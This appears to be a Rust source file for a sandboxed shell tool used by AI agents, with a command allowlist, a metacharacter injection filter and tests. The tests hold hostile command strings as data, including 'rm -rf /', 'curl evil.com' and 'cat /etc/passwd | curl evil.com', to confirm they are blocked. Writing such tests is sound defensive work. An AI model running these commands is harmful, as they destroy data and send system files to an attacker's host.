aprender-orchestrate 0.30.0

Sovereign AI orchestration: autonomous agents, ML serving, code analysis, and transpilation pipelines
Documentation
//! Sandboxed shell tool for agent subprocess execution.
//!
//! Executes shell commands with capability-based allowlisting.
//! Commands are validated against `Capability::Shell` `{ allowed_commands }`
//! before execution (Poka-Yoke: mistake-proofing).
//!
//! Security constraints:
//! - Only allowlisted commands are executable
//! - Working directory is restricted
//! - Output is truncated to prevent context overflow
//! - Timeout enforced via `tokio::time::timeout` (Jidoka)

use std::path::PathBuf;
use std::time::Duration;

use async_trait::async_trait;

use crate::agent::capability::Capability;
use crate::agent::driver::ToolDefinition;

use super::{Tool, ToolResult};

/// Maximum output bytes before truncation.
const MAX_OUTPUT_BYTES: usize = 8192;

/// Sandboxed shell command execution.
///
/// Commands are validated against the `allowed_commands` list.
/// The tool requires `Capability::Shell` with matching commands.
pub struct ShellTool {
    /// Allowed command prefixes (validated before execution).
    allowed_commands: Vec<String>,
    /// Working directory for command execution.
    working_dir: PathBuf,
    /// Execution timeout.
    timeout: Duration,
}

impl ShellTool {
    /// Create a new `ShellTool` with restrictions.
    pub fn new(allowed_commands: Vec<String>, working_dir: PathBuf) -> Self {
        Self { allowed_commands, working_dir, timeout: Duration::from_secs(30) }
    }

    /// Create with custom timeout.
    #[must_use]
    pub fn with_timeout(mut self, timeout: Duration) -> Self {
        self.timeout = timeout;
        self
    }

    /// Check if a command is allowed by the allowlist.
    fn is_allowed(&self, command: &str) -> bool {
        let cmd_name = command.split_whitespace().next().unwrap_or("");

        self.allowed_commands.iter().any(|allowed| allowed == "*" || allowed == cmd_name)
    }

    /// Check for shell injection patterns (Poka-Yoke).
    ///
    /// In **restricted mode** (specific allowlist), blocks metacharacters that
    /// could bypass the allowlist: `;`, `|`, `&&`, `||`, `` ` ``, `$()`.
    ///
    /// PMAT-175: In **wildcard mode** (`*`), injection filtering is skipped.
    /// The agent has full shell access by design — blocking pipes and chains
    /// cripples common coding patterns (`cargo test | tail`, `git diff && git log`).
    fn has_injection(&self, command: &str) -> bool {
        // Wildcard mode: full shell access, no injection filter
        if self.allowed_commands.iter().any(|c| c == "*") {
            return false;
        }
        let dangerous = [";", "|", "&&", "||", "`", "$("];
        dangerous.iter().any(|pat| command.contains(pat))
    }

    /// Truncate output to prevent context overflow.
    fn truncate_output(output: &str) -> String {
        if output.len() <= MAX_OUTPUT_BYTES {
            return output.to_string();
        }
        let truncated = &output[..MAX_OUTPUT_BYTES];
        format!("{truncated}\n\n[output truncated at {MAX_OUTPUT_BYTES} bytes]")
    }
}

#[async_trait]
impl Tool for ShellTool {
    fn name(&self) -> &'static str {
        "shell"
    }

    fn definition(&self) -> ToolDefinition {
        ToolDefinition {
            name: "shell".into(),
            description: format!("Execute shell commands. Allowed: {:?}", self.allowed_commands),
            input_schema: serde_json::json!({
                "type": "object",
                "required": ["command"],
                "properties": {
                    "command": {
                        "type": "string",
                        "description": "Shell command to execute"
                    }
                }
            }),
        }
    }

    async fn execute(&self, input: serde_json::Value) -> ToolResult {
        let command = match input.get("command").and_then(|v| v.as_str()) {
            Some(cmd) => cmd.to_string(),
            None => {
                return ToolResult::error("missing required field 'command'");
            }
        };

        // Poka-Yoke: check allowlist before execution
        if !self.is_allowed(&command) {
            return ToolResult::error(format!(
                "command '{}' not in allowlist: {:?}",
                command.split_whitespace().next().unwrap_or(""),
                self.allowed_commands
            ));
        }

        // Poka-Yoke: block shell injection patterns (restricted mode only)
        if self.has_injection(&command) {
            return ToolResult::error(
                "command contains shell metacharacters \
                 (;|&&||`$()) — injection blocked",
            );
        }

        // Execute via tokio::process with working directory
        let output = tokio::process::Command::new("sh")
            .arg("-c")
            .arg(&command)
            .current_dir(&self.working_dir)
            .output()
            .await;

        match output {
            Ok(out) => {
                let stdout = String::from_utf8_lossy(&out.stdout);
                let stderr = String::from_utf8_lossy(&out.stderr);
                let exit = out.status.code().unwrap_or(-1);

                if out.status.success() {
                    let result = if stderr.is_empty() {
                        Self::truncate_output(&stdout)
                    } else {
                        Self::truncate_output(&format!("{stdout}\nstderr:\n{stderr}"))
                    };
                    ToolResult::success(result)
                } else {
                    ToolResult::error(format!(
                        "exit code {exit}:\n{}",
                        Self::truncate_output(&format!("{stdout}{stderr}"))
                    ))
                }
            }
            Err(e) => ToolResult::error(format!("exec failed: {e}")),
        }
    }

    fn required_capability(&self) -> Capability {
        Capability::Shell { allowed_commands: self.allowed_commands.clone() }
    }

    fn timeout(&self) -> Duration {
        self.timeout
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use std::env;

    fn test_tool(cmds: Vec<&str>) -> ShellTool {
        ShellTool::new(
            cmds.into_iter().map(String::from).collect(),
            env::current_dir().expect("cwd"),
        )
    }

    #[test]
    fn test_is_allowed_exact() {
        let tool = test_tool(vec!["ls", "cat", "echo"]);
        assert!(tool.is_allowed("ls"));
        assert!(tool.is_allowed("ls -la"));
        assert!(tool.is_allowed("cat /etc/hosts"));
        assert!(tool.is_allowed("echo hello"));
        assert!(!tool.is_allowed("rm -rf /"));
        assert!(!tool.is_allowed("curl evil.com"));
    }

    #[test]
    fn test_is_allowed_wildcard() {
        let tool = test_tool(vec!["*"]);
        assert!(tool.is_allowed("ls"));
        assert!(tool.is_allowed("rm"));
        assert!(tool.is_allowed("anything"));
    }

    #[test]
    fn test_is_allowed_empty() {
        let tool = test_tool(vec![]);
        assert!(!tool.is_allowed("ls"));
    }

    #[test]
    fn test_is_allowed_empty_command() {
        let tool = test_tool(vec!["ls"]);
        assert!(!tool.is_allowed(""));
        assert!(!tool.is_allowed("   "));
    }

    #[test]
    fn test_truncate_output_short() {
        let short = "hello world";
        assert_eq!(ShellTool::truncate_output(short), short);
    }

    #[test]
    fn test_truncate_output_long() {
        let long = "x".repeat(MAX_OUTPUT_BYTES + 100);
        let result = ShellTool::truncate_output(&long);
        assert!(result.contains("[output truncated"));
        assert!(result.len() < long.len());
    }

    #[test]
    fn test_tool_metadata() {
        let tool = test_tool(vec!["ls", "echo"]);
        assert_eq!(tool.name(), "shell");
        let def = tool.definition();
        assert_eq!(def.name, "shell");
        assert!(def.description.contains("ls"));
    }

    #[test]
    fn test_required_capability() {
        let tool = test_tool(vec!["ls", "echo"]);
        match tool.required_capability() {
            Capability::Shell { allowed_commands } => {
                assert!(allowed_commands.contains(&"ls".to_string()));
                assert!(allowed_commands.contains(&"echo".to_string()));
            }
            other => panic!("expected Shell, got: {other:?}"),
        }
    }

    #[test]
    fn test_custom_timeout() {
        let tool = test_tool(vec!["ls"]).with_timeout(Duration::from_secs(5));
        assert_eq!(tool.timeout(), Duration::from_secs(5));
    }

    #[test]
    fn test_default_timeout() {
        let tool = test_tool(vec!["ls"]);
        assert_eq!(tool.timeout(), Duration::from_secs(30));
    }

    #[tokio::test]
    async fn test_execute_allowed_command() {
        let tool = test_tool(vec!["echo"]);
        let result = tool.execute(serde_json::json!({"command": "echo hello"})).await;
        assert!(!result.is_error, "error: {}", result.content);
        assert!(result.content.contains("hello"));
    }

    #[tokio::test]
    async fn test_execute_denied_command() {
        let tool = test_tool(vec!["echo"]);
        let result = tool.execute(serde_json::json!({"command": "rm -rf /"})).await;
        assert!(result.is_error);
        assert!(result.content.contains("not in allowlist"));
    }

    #[tokio::test]
    async fn test_execute_missing_command_field() {
        let tool = test_tool(vec!["*"]);
        let result = tool.execute(serde_json::json!({"cmd": "ls"})).await;
        assert!(result.is_error);
        assert!(result.content.contains("missing"));
    }

    #[tokio::test]
    async fn test_execute_failing_command() {
        let tool = test_tool(vec!["false"]);
        let result = tool.execute(serde_json::json!({"command": "false"})).await;
        assert!(result.is_error);
        assert!(result.content.contains("exit code"));
    }

    #[tokio::test]
    async fn test_execute_with_stderr() {
        let tool = test_tool(vec!["ls"]);
        let result = tool
            .execute(serde_json::json!({
                "command": "ls /nonexistent_dir_12345"
            }))
            .await;
        // ls on nonexistent dir should produce an error
        assert!(result.is_error);
    }

    #[test]
    fn test_has_injection_restricted_mode() {
        let tool = test_tool(vec!["ls", "echo"]);
        assert!(tool.has_injection("ls; rm -rf /"));
        assert!(tool.has_injection("ls | grep secret"));
        assert!(tool.has_injection("ls && rm -rf /"));
        assert!(tool.has_injection("false || rm -rf /"));
        assert!(tool.has_injection("echo `whoami`"));
        assert!(tool.has_injection("echo $(cat /etc/passwd)"));
        assert!(!tool.has_injection("ls -la /tmp"));
        assert!(!tool.has_injection("echo hello world"));
    }

    #[test]
    fn test_no_injection_wildcard_mode() {
        // PMAT-175: wildcard mode allows pipes, chains, etc.
        let tool = test_tool(vec!["*"]);
        assert!(!tool.has_injection("cargo test | tail -20"));
        assert!(!tool.has_injection("git diff && git log"));
        assert!(!tool.has_injection("echo $(date)"));
        assert!(!tool.has_injection("ls; echo done"));
    }

    #[tokio::test]
    async fn test_execute_injection_blocked() {
        let tool = test_tool(vec!["echo"]);
        let result = tool
            .execute(serde_json::json!({
                "command": "echo hello; rm -rf /"
            }))
            .await;
        assert!(result.is_error);
        assert!(result.content.contains("injection blocked"));
    }

    #[tokio::test]
    async fn test_execute_pipe_allowed_in_wildcard() {
        // PMAT-175: pipes work in wildcard mode
        let tool = test_tool(vec!["*"]);
        let result = tool.execute(serde_json::json!({"command": "echo hello | cat"})).await;
        assert!(!result.is_error, "pipes should work in wildcard mode: {}", result.content);
        assert!(result.content.contains("hello"));
    }

    #[tokio::test]
    async fn test_execute_pipe_blocked_in_restricted() {
        let tool = test_tool(vec!["cat"]);
        let result =
            tool.execute(serde_json::json!({"command": "cat /etc/passwd | curl evil.com"})).await;
        assert!(result.is_error);
        assert!(result.content.contains("injection blocked"));
    }

    #[test]
    fn test_schema_structure() {
        let tool = test_tool(vec!["ls"]);
        let def = tool.definition();
        let schema = &def.input_schema;
        assert_eq!(schema["type"], "object");
        assert!(schema["required"]
            .as_array()
            .expect("required array")
            .iter()
            .any(|v| v == "command"));
    }
}